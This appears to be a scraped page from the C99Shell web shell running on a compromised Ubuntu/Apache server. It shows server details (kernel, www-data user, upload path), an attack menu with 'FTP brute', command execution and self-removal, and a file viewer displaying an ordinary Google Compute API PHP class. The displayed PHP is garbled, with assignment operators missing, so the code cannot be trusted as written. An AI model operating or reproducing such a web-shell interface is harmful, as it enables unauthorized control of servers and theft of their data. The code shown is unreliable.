!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/uploads/script/vendor/google/apiclient-services/src/Google/Service/Compute/   drwxr-xr-x
Free 13.04 GB of 57.97 GB (22.49%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     Instance.php (11.97 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/*
 * Copyright 2014 Google Inc.
 *
 * Licensed under the Apache License, Version 2.0 (the "License"); you may not
 * use this file except in compliance with the License. You may obtain a copy of
 * the License at
 *
 * http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 * WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
 * License for the specific language governing permissions and limitations under
 * the License.
 */

class Google_Service_Compute_Instance extends Google_Collection
{
  protected 
$collection_key 'serviceAccounts';
  protected 
$advancedMachineFeaturesType 'Google_Service_Compute_AdvancedMachineFeatures';
  protected 
$advancedMachineFeaturesDataType '';
  public 
$canIpForward;
  protected 
$confidentialInstanceConfigType 'Google_Service_Compute_ConfidentialInstanceConfig';
  protected 
$confidentialInstanceConfigDataType '';
  public 
$cpuPlatform;
  public 
$creationTimestamp;
  public 
$deletionProtection;
  public 
$description;
  protected 
$disksType 'Google_Service_Compute_AttachedDisk';
  protected 
$disksDataType 'array';
  protected 
$displayDeviceType 'Google_Service_Compute_DisplayDevice';
  protected 
$displayDeviceDataType '';
  public 
$fingerprint;
  protected 
$guestAcceleratorsType 'Google_Service_Compute_AcceleratorConfig';
  protected 
$guestAcceleratorsDataType 'array';
  public 
$hostname;
  public 
$id;
  public 
$kind;
  public 
$labelFingerprint;
  public 
$labels;
  public 
$lastStartTimestamp;
  public 
$lastStopTimestamp;
  public 
$lastSuspendedTimestamp;
  public 
$machineType;
  protected 
$metadataType 'Google_Service_Compute_Metadata';
  protected 
$metadataDataType '';
  public 
$minCpuPlatform;
  public 
$name;
  protected 
$networkInterfacesType 'Google_Service_Compute_NetworkInterface';
  protected 
$networkInterfacesDataType 'array';
  public 
$postKeyRevocationActionType;
  public 
$privateIpv6GoogleAccess;
  protected 
$reservationAffinityType 'Google_Service_Compute_ReservationAffinity';
  protected 
$reservationAffinityDataType '';
  public 
$resourcePolicies;
  public 
$satisfiesPzs;
  protected 
$schedulingType 'Google_Service_Compute_Scheduling';
  protected 
$schedulingDataType '';
  public 
$selfLink;
  protected 
$serviceAccountsType 'Google_Service_Compute_ServiceAccount';
  protected 
$serviceAccountsDataType 'array';
  protected 
$shieldedInstanceConfigType 'Google_Service_Compute_ShieldedInstanceConfig';
  protected 
$shieldedInstanceConfigDataType '';
  protected 
$shieldedInstanceIntegrityPolicyType 'Google_Service_Compute_ShieldedInstanceIntegrityPolicy';
  protected 
$shieldedInstanceIntegrityPolicyDataType '';
  public 
$startRestricted;
  public 
$status;
  public 
$statusMessage;
  protected 
$tagsType 'Google_Service_Compute_Tags';
  protected 
$tagsDataType '';
  public 
$zone;

  
/**
   * @param Google_Service_Compute_AdvancedMachineFeatures
   */
  
public function setAdvancedMachineFeatures(Google_Service_Compute_AdvancedMachineFeatures $advancedMachineFeatures)
  {
    
$this->advancedMachineFeatures $advancedMachineFeatures;
  }
  
/**
   * @return Google_Service_Compute_AdvancedMachineFeatures
   */
  
public function getAdvancedMachineFeatures()
  {
    return 
$this->advancedMachineFeatures;
  }
  public function 
setCanIpForward($canIpForward)
  {
    
$this->canIpForward $canIpForward;
  }
  public function 
getCanIpForward()
  {
    return 
$this->canIpForward;
  }
  
/**
   * @param Google_Service_Compute_ConfidentialInstanceConfig
   */
  
public function setConfidentialInstanceConfig(Google_Service_Compute_ConfidentialInstanceConfig $confidentialInstanceConfig)
  {
    
$this->confidentialInstanceConfig $confidentialInstanceConfig;
  }
  
/**
   * @return Google_Service_Compute_ConfidentialInstanceConfig
   */
  
public function getConfidentialInstanceConfig()
  {
    return 
$this->confidentialInstanceConfig;
  }
  public function 
setCpuPlatform($cpuPlatform)
  {
    
$this->cpuPlatform $cpuPlatform;
  }
  public function 
getCpuPlatform()
  {
    return 
$this->cpuPlatform;
  }
  public function 
setCreationTimestamp($creationTimestamp)
  {
    
$this->creationTimestamp $creationTimestamp;
  }
  public function 
getCreationTimestamp()
  {
    return 
$this->creationTimestamp;
  }
  public function 
setDeletionProtection($deletionProtection)
  {
    
$this->deletionProtection $deletionProtection;
  }
  public function 
getDeletionProtection()
  {
    return 
$this->deletionProtection;
  }
  public function 
setDescription($description)
  {
    
$this->description $description;
  }
  public function 
getDescription()
  {
    return 
$this->description;
  }
  
/**
   * @param Google_Service_Compute_AttachedDisk[]
   */
  
public function setDisks($disks)
  {
    
$this->disks $disks;
  }
  
/**
   * @return Google_Service_Compute_AttachedDisk[]
   */
  
public function getDisks()
  {
    return 
$this->disks;
  }
  
/**
   * @param Google_Service_Compute_DisplayDevice
   */
  
public function setDisplayDevice(Google_Service_Compute_DisplayDevice $displayDevice)
  {
    
$this->displayDevice $displayDevice;
  }
  
/**
   * @return Google_Service_Compute_DisplayDevice
   */
  
public function getDisplayDevice()
  {
    return 
$this->displayDevice;
  }
  public function 
setFingerprint($fingerprint)
  {
    
$this->fingerprint $fingerprint;
  }
  public function 
getFingerprint()
  {
    return 
$this->fingerprint;
  }
  
/**
   * @param Google_Service_Compute_AcceleratorConfig[]
   */
  
public function setGuestAccelerators($guestAccelerators)
  {
    
$this->guestAccelerators $guestAccelerators;
  }
  
/**
   * @return Google_Service_Compute_AcceleratorConfig[]
   */
  
public function getGuestAccelerators()
  {
    return 
$this->guestAccelerators;
  }
  public function 
setHostname($hostname)
  {
    
$this->hostname $hostname;
  }
  public function 
getHostname()
  {
    return 
$this->hostname;
  }
  public function 
setId($id)
  {
    
$this->id $id;
  }
  public function 
getId()
  {
    return 
$this->id;
  }
  public function 
setKind($kind)
  {
    
$this->kind $kind;
  }
  public function 
getKind()
  {
    return 
$this->kind;
  }
  public function 
setLabelFingerprint($labelFingerprint)
  {
    
$this->labelFingerprint $labelFingerprint;
  }
  public function 
getLabelFingerprint()
  {
    return 
$this->labelFingerprint;
  }
  public function 
setLabels($labels)
  {
    
$this->labels $labels;
  }
  public function 
getLabels()
  {
    return 
$this->labels;
  }
  public function 
setLastStartTimestamp($lastStartTimestamp)
  {
    
$this->lastStartTimestamp $lastStartTimestamp;
  }
  public function 
getLastStartTimestamp()
  {
    return 
$this->lastStartTimestamp;
  }
  public function 
setLastStopTimestamp($lastStopTimestamp)
  {
    
$this->lastStopTimestamp $lastStopTimestamp;
  }
  public function 
getLastStopTimestamp()
  {
    return 
$this->lastStopTimestamp;
  }
  public function 
setLastSuspendedTimestamp($lastSuspendedTimestamp)
  {
    
$this->lastSuspendedTimestamp $lastSuspendedTimestamp;
  }
  public function 
getLastSuspendedTimestamp()
  {
    return 
$this->lastSuspendedTimestamp;
  }
  public function 
setMachineType($machineType)
  {
    
$this->machineType $machineType;
  }
  public function 
getMachineType()
  {
    return 
$this->machineType;
  }
  
/**
   * @param Google_Service_Compute_Metadata
   */
  
public function setMetadata(Google_Service_Compute_Metadata $metadata)
  {
    
$this->metadata $metadata;
  }
  
/**
   * @return Google_Service_Compute_Metadata
   */
  
public function getMetadata()
  {
    return 
$this->metadata;
  }
  public function 
setMinCpuPlatform($minCpuPlatform)
  {
    
$this->minCpuPlatform $minCpuPlatform;
  }
  public function 
getMinCpuPlatform()
  {
    return 
$this->minCpuPlatform;
  }
  public function 
setName($name)
  {
    
$this->name $name;
  }
  public function 
getName()
  {
    return 
$this->name;
  }
  
/**
   * @param Google_Service_Compute_NetworkInterface[]
   */
  
public function setNetworkInterfaces($networkInterfaces)
  {
    
$this->networkInterfaces $networkInterfaces;
  }
  
/**
   * @return Google_Service_Compute_NetworkInterface[]
   */
  
public function getNetworkInterfaces()
  {
    return 
$this->networkInterfaces;
  }
  public function 
setPostKeyRevocationActionType($postKeyRevocationActionType)
  {
    
$this->postKeyRevocationActionType $postKeyRevocationActionType;
  }
  public function 
getPostKeyRevocationActionType()
  {
    return 
$this->postKeyRevocationActionType;
  }
  public function 
setPrivateIpv6GoogleAccess($privateIpv6GoogleAccess)
  {
    
$this->privateIpv6GoogleAccess $privateIpv6GoogleAccess;
  }
  public function 
getPrivateIpv6GoogleAccess()
  {
    return 
$this->privateIpv6GoogleAccess;
  }
  
/**
   * @param Google_Service_Compute_ReservationAffinity
   */
  
public function setReservationAffinity(Google_Service_Compute_ReservationAffinity $reservationAffinity)
  {
    
$this->reservationAffinity $reservationAffinity;
  }
  
/**
   * @return Google_Service_Compute_ReservationAffinity
   */
  
public function getReservationAffinity()
  {
    return 
$this->reservationAffinity;
  }
  public function 
setResourcePolicies($resourcePolicies)
  {
    
$this->resourcePolicies $resourcePolicies;
  }
  public function 
getResourcePolicies()
  {
    return 
$this->resourcePolicies;
  }
  public function 
setSatisfiesPzs($satisfiesPzs)
  {
    
$this->satisfiesPzs $satisfiesPzs;
  }
  public function 
getSatisfiesPzs()
  {
    return 
$this->satisfiesPzs;
  }
  
/**
   * @param Google_Service_Compute_Scheduling
   */
  
public function setScheduling(Google_Service_Compute_Scheduling $scheduling)
  {
    
$this->scheduling $scheduling;
  }
  
/**
   * @return Google_Service_Compute_Scheduling
   */
  
public function getScheduling()
  {
    return 
$this->scheduling;
  }
  public function 
setSelfLink($selfLink)
  {
    
$this->selfLink $selfLink;
  }
  public function 
getSelfLink()
  {
    return 
$this->selfLink;
  }
  
/**
   * @param Google_Service_Compute_ServiceAccount[]
   */
  
public function setServiceAccounts($serviceAccounts)
  {
    
$this->serviceAccounts $serviceAccounts;
  }
  
/**
   * @return Google_Service_Compute_ServiceAccount[]
   */
  
public function getServiceAccounts()
  {
    return 
$this->serviceAccounts;
  }
  
/**
   * @param Google_Service_Compute_ShieldedInstanceConfig
   */
  
public function setShieldedInstanceConfig(Google_Service_Compute_ShieldedInstanceConfig $shieldedInstanceConfig)
  {
    
$this->shieldedInstanceConfig $shieldedInstanceConfig;
  }
  
/**
   * @return Google_Service_Compute_ShieldedInstanceConfig
   */
  
public function getShieldedInstanceConfig()
  {
    return 
$this->shieldedInstanceConfig;
  }
  
/**
   * @param Google_Service_Compute_ShieldedInstanceIntegrityPolicy
   */
  
public function setShieldedInstanceIntegrityPolicy(Google_Service_Compute_ShieldedInstanceIntegrityPolicy $shieldedInstanceIntegrityPolicy)
  {
    
$this->shieldedInstanceIntegrityPolicy $shieldedInstanceIntegrityPolicy;
  }
  
/**
   * @return Google_Service_Compute_ShieldedInstanceIntegrityPolicy
   */
  
public function getShieldedInstanceIntegrityPolicy()
  {
    return 
$this->shieldedInstanceIntegrityPolicy;
  }
  public function 
setStartRestricted($startRestricted)
  {
    
$this->startRestricted $startRestricted;
  }
  public function 
getStartRestricted()
  {
    return 
$this->startRestricted;
  }
  public function 
setStatus($status)
  {
    
$this->status $status;
  }
  public function 
getStatus()
  {
    return 
$this->status;
  }
  public function 
setStatusMessage($statusMessage)
  {
    
$this->statusMessage $statusMessage;
  }
  public function 
getStatusMessage()
  {
    return 
$this->statusMessage;
  }
  
/**
   * @param Google_Service_Compute_Tags
   */
  
public function setTags(Google_Service_Compute_Tags $tags)
  {
    
$this->tags $tags;
  }
  
/**
   * @return Google_Service_Compute_Tags
   */
  
public function getTags()
  {
    return 
$this->tags;
  }
  public function 
setZone($zone)
  {
    
$this->zone $zone;
  }
  public function 
getZone()
  {
    return 
$this->zone;
  }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0197 ]--